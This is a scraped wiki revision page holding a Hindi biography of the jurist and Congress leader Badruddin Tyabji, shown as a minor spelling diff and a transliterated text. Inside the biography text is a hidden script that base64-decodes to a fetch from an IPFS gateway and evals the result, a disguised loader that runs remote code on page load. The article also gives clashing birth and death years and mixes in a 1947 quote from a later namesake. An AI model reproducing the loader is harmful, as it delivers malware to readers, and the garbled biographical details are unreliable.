Difference between revisions of "बदरुद्दीन तैयब जी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "काफी" to "काफ़ी")
m (Text replace - "कानून" to "क़ानून")
Line 2: Line 2:
 
==शिक्षा==
 
==शिक्षा==
 
{{tocright}}
 
{{tocright}}
बदरुद्दीन प्रारंभिक शिक्षा पूरी करने के बाद कानून की शिक्षा प्राप्त करने के लिए [[इंग्लैण्ड]] चले गए और वहां से बैरिस्टर बन कर लौटे। उन्होंने मुम्बई में जिस समय वकालत शुरू की तब वहां न तो कोई न्यायाधीश भारतीय था, न कोई वकील। प्रतिभा और योग्यता के बल पर शीघ्र ही बदरुद्दीन तैयब जी की गणना उच्च कोटि के भारतीय वकीलों में होने लगी। फीरोजशाह मेहता, उमेशचंद्र बनर्जी, [[दादा भाई नैरोजी]] आदि के संपर्क में आने पर वे सार्वजनिक कार्यों में भी रूचि लेने लगे। उन्होंने ‘मुंबई प्रेसिडेंसी एसोसिएशन’ की स्थापना की और मुसलमानों में शिक्षा का प्रचार करने के लिए ‘अंजुमने इस्लाम’ नामक संस्था को जन्म दिया। वे महिलाओं की आज़ादी और शिक्षा के भी समर्थक थे। उन्होंने अपनी पुत्रियों को उच्च शिक्षा दिलाई और अपने परिवार की महिलाओं का पर्दा भी समाप्त कराया, जो उन दिनों बड़े साहस का काम था।
+
बदरुद्दीन प्रारंभिक शिक्षा पूरी करने के बाद क़ानून की शिक्षा प्राप्त करने के लिए [[इंग्लैण्ड]] चले गए और वहां से बैरिस्टर बन कर लौटे। उन्होंने मुम्बई में जिस समय वकालत शुरू की तब वहां न तो कोई न्यायाधीश भारतीय था, न कोई वकील। प्रतिभा और योग्यता के बल पर शीघ्र ही बदरुद्दीन तैयब जी की गणना उच्च कोटि के भारतीय वकीलों में होने लगी। फीरोजशाह मेहता, उमेशचंद्र बनर्जी, [[दादा भाई नैरोजी]] आदि के संपर्क में आने पर वे सार्वजनिक कार्यों में भी रूचि लेने लगे। उन्होंने ‘मुंबई प्रेसिडेंसी एसोसिएशन’ की स्थापना की और मुसलमानों में शिक्षा का प्रचार करने के लिए ‘अंजुमने इस्लाम’ नामक संस्था को जन्म दिया। वे महिलाओं की आज़ादी और शिक्षा के भी समर्थक थे। उन्होंने अपनी पुत्रियों को उच्च शिक्षा दिलाई और अपने परिवार की महिलाओं का पर्दा भी समाप्त कराया, जो उन दिनों बड़े साहस का काम था।
  
 
==मुंबई हाईकोर्ट के न्यायधीश==
 
==मुंबई हाईकोर्ट के न्यायधीश==
Line 10: Line 10:
 
उनकी गणना [[भारत]] के प्रमुख नेताओं में होती थी। [[भारतीय राष्ट्रीय कांग्रेस]] के 1887 ई. में [[मद्रास]] में आयोजित 'तीसरे वार्षिक अधिवेशन' के अध्यक्ष वे सर्वसम्मति से चुने गए थे। अपने अध्यक्षीय भाषण में उन्होंने कहा था-  
 
उनकी गणना [[भारत]] के प्रमुख नेताओं में होती थी। [[भारतीय राष्ट्रीय कांग्रेस]] के 1887 ई. में [[मद्रास]] में आयोजित 'तीसरे वार्षिक अधिवेशन' के अध्यक्ष वे सर्वसम्मति से चुने गए थे। अपने अध्यक्षीय भाषण में उन्होंने कहा था-  
 
<blockquote>‘‘समझ में नहीं आता कि सभी के हित में देशवासियों के साथ कंधे से कंधा मिलाकर मुसलमान आगे क्यों नहीं बढ़ सकते। उन्हें कोई हिचक नहीं होनी चाहिए।’’</blockquote>
 
<blockquote>‘‘समझ में नहीं आता कि सभी के हित में देशवासियों के साथ कंधे से कंधा मिलाकर मुसलमान आगे क्यों नहीं बढ़ सकते। उन्हें कोई हिचक नहीं होनी चाहिए।’’</blockquote>
19वी शताब्‍दी के अंत में [[भारत]] के एक प्रमुख नेता थे जब देश आजादी की शुरूआती जंग के चरण में था। तैयबजी अनेक प्रतिभाओं के व्‍यक्ति थे। वे एक बड़े नेता, समाज सुधारक, शिक्षाविद और कानून के ज्ञाता थे। उन्‍हें 'बॉम्‍बे उच्‍च न्‍यायालय का प्रथम भारतीय अधिवक्‍ता' होने का गौरव प्राप्‍त है। वे हिन्‍दू- मुस्लिम एकता के प्रबल समर्थक थे। तैयबजी का विश्‍वास था कि सांस्‍कृतिक और धार्मिक विविधताएं देश के हितों को आगे बढ़ाने की प्रक्रिया में आड़े नहीं आनी चाहिए। उन्‍होंने धर्मनिरपेक्षता की संकल्‍पना ऐसे समय पर प्रसारित की जब देश के राजनैतिक मामलों में इसका बहुत कम महत्‍व था।<ref>{{cite web |url=http://www.bharat.gov.in/govt/publications/nov09/tyabji.php|title=बदरुद्दीन तैयबजी|accessmonthday=26 अगस्त|accessyear=2011|last= |first= |authorlink=ए जी नूरानी|format= |publisher=प्रकाशन विभाग, सूचना और प्रसारण मंत्रालय, भारत सरकार|language=हिंदी}}</ref>
+
19वी शताब्‍दी के अंत में [[भारत]] के एक प्रमुख नेता थे जब देश आजादी की शुरूआती जंग के चरण में था। तैयबजी अनेक प्रतिभाओं के व्‍यक्ति थे। वे एक बड़े नेता, समाज सुधारक, शिक्षाविद और क़ानून के ज्ञाता थे। उन्‍हें 'बॉम्‍बे उच्‍च न्‍यायालय का प्रथम भारतीय अधिवक्‍ता' होने का गौरव प्राप्‍त है। वे हिन्‍दू- मुस्लिम एकता के प्रबल समर्थक थे। तैयबजी का विश्‍वास था कि सांस्‍कृतिक और धार्मिक विविधताएं देश के हितों को आगे बढ़ाने की प्रक्रिया में आड़े नहीं आनी चाहिए। उन्‍होंने धर्मनिरपेक्षता की संकल्‍पना ऐसे समय पर प्रसारित की जब देश के राजनैतिक मामलों में इसका बहुत कम महत्‍व था।<ref>{{cite web |url=http://www.bharat.gov.in/govt/publications/nov09/tyabji.php|title=बदरुद्दीन तैयबजी|accessmonthday=26 अगस्त|accessyear=2011|last= |first= |authorlink=ए जी नूरानी|format= |publisher=प्रकाशन विभाग, सूचना और प्रसारण मंत्रालय, भारत सरकार|language=हिंदी}}</ref>
 
==स्वतंत्रता दिवस के अवसर पर==
 
==स्वतंत्रता दिवस के अवसर पर==
 
1932 बैच के आईसीएस अधिकारी बदरुद्दीन तैयब जी ने अपने एक इंटरव्यू में कहा था कि -  
 
1932 बैच के आईसीएस अधिकारी बदरुद्दीन तैयब जी ने अपने एक इंटरव्यू में कहा था कि -  

Revision as of 11:59, 10 September 2011

badaruddin taiyabaji (janm 8 aktoobar, 1803 ee.- nidhan 1906 ee.), apane samay ke prasiddh vakil, nyayadhish aur kaangres ke neta badaruddin taiyab ji ka janm 8 aktoobar, 1844 ee. ko mumbee ke ek dhani muslim parivar mean hua tha.

shiksha

badaruddin praranbhik shiksha poori karane ke bad qanoon ki shiksha prapt karane ke lie ianglaind chale ge aur vahaan se bairistar ban kar laute. unhoanne mumbee mean jis samay vakalat shuroo ki tab vahaan n to koee nyayadhish bharatiy tha, n koee vakil. pratibha aur yogyata ke bal par shighr hi badaruddin taiyab ji ki ganana uchch koti ke bharatiy vakiloan mean hone lagi. phirojashah mehata, umeshachandr banarji, dada bhaee nairoji adi ke sanpark mean ane par ve sarvajanik karyoan mean bhi roochi lene lage. unhoanne ‘muanbee presideansi esosieshan’ ki sthapana ki aur musalamanoan mean shiksha ka prachar karane ke lie ‘aanjumane islam’ namak sanstha ko janm diya. ve mahilaoan ki azadi aur shiksha ke bhi samarthak the. unhoanne apani putriyoan ko uchch shiksha dilaee aur apane parivar ki mahilaoan ka parda bhi samapt karaya, jo un dinoan b de sahas ka kam tha.

muanbee haeekort ke nyayadhish

ve dharmanirapeksh samaj ki kalpana karate the. apani nishpakshata ke lie bhi unaki b di khyati thi. bad mean jab unaki niyukti 'muanbee haeekort' ke nyayadhish ke pad par huee, to bal gangadhar tilak par sarakar dvara chalaye gaye rajadroh ke mukadame mean tilak ko jamanat par chho dane ka sahasik kary taiyab ji ne hi kiya tha.

pramukh neta

chitr:Blockquote-open.gif us din iandiya get mean ayojit samaroh mean itani bhi d thi ki mauantabaitan aur unaki patni ko sabhasthal tak le jane mean kafi mashakkat karani p di thi, jahaan se javahar lal neharoo bhashan de rahe the, vahaan tak pahuanchane mean kafi parishram karana p da tha. pahali bar jab logoan ne 'tiranga jhanda' phaharate hue dekha to unake chehare par ajib si chamak thi. chitr:Blockquote-close.gif

- badaruddin taiyab ji

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> unaki ganana bharat ke pramukh netaoan mean hoti thi. bharatiy rashtriy kaangres ke 1887 ee. mean madras mean ayojit 'tisare varshik adhiveshan' ke adhyaksh ve sarvasammati se chune ge the. apane adhyakshiy bhashan mean unhoanne kaha tha-

‘‘samajh mean nahian ata ki sabhi ke hit mean deshavasiyoan ke sath kandhe se kandha milakar musalaman age kyoan nahian badh sakate. unhean koee hichak nahian honi chahie.’’

19vi shatabh‍di ke aant mean bharat ke ek pramukh neta the jab desh ajadi ki shurooati jang ke charan mean tha. taiyabaji anek pratibhaoan ke vh‍yakti the. ve ek b de neta, samaj sudharak, shikshavid aur qanoon ke jnata the. unh‍hean 'b aaumh‍be uchh‍ch nh‍yayalay ka pratham bharatiy adhivakh‍ta' hone ka gaurav praph‍t hai. ve hinh‍doo- muslim ekata ke prabal samarthak the. taiyabaji ka vishh‍vas tha ki saansh‍kritik aur dharmik vividhataean desh ke hitoan ko age badhane ki prakriya mean a de nahian ani chahie. unh‍hoanne dharmanirapekshata ki sankalh‍pana aise samay par prasarit ki jab desh ke rajanaitik mamaloan mean isaka bahut kam mahath‍v tha.[1]

svatantrata divas ke avasar par

1932 baich ke aeesies adhikari badaruddin taiyab ji ne apane ek iantaravyoo mean kaha tha ki - us din iandiya get mean ayojit samaroh mean itani bhi d thi ki mauantabaitan aur unaki patni ko sabha sthal tak le jane mean kafi mashakkat karani p di thi. jahaan se javahar lal neharoo bhashan de rahe the , vahaan tak pahuanchane mean kafi parishram karana p da tha. pahali bar jab logoan ne tiranga jhanda phaharate hue dekha to unake chehare par ajib si chamak thi.[2]'

nidhan

1909 ee. mean taiyab ji ka dehaant ho gaya.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. badaruddin taiyabaji (hiandi) prakashan vibhag, soochana aur prasaran mantralay, bharat sarakar. abhigaman tithi: 26 agast, 2011.
  2. jhanda phahara kar hi ann grahan karate the log (hiandi). . abhigaman tithi: 26 agast, 2011.

bahari k diyaan

sanbandhit lekh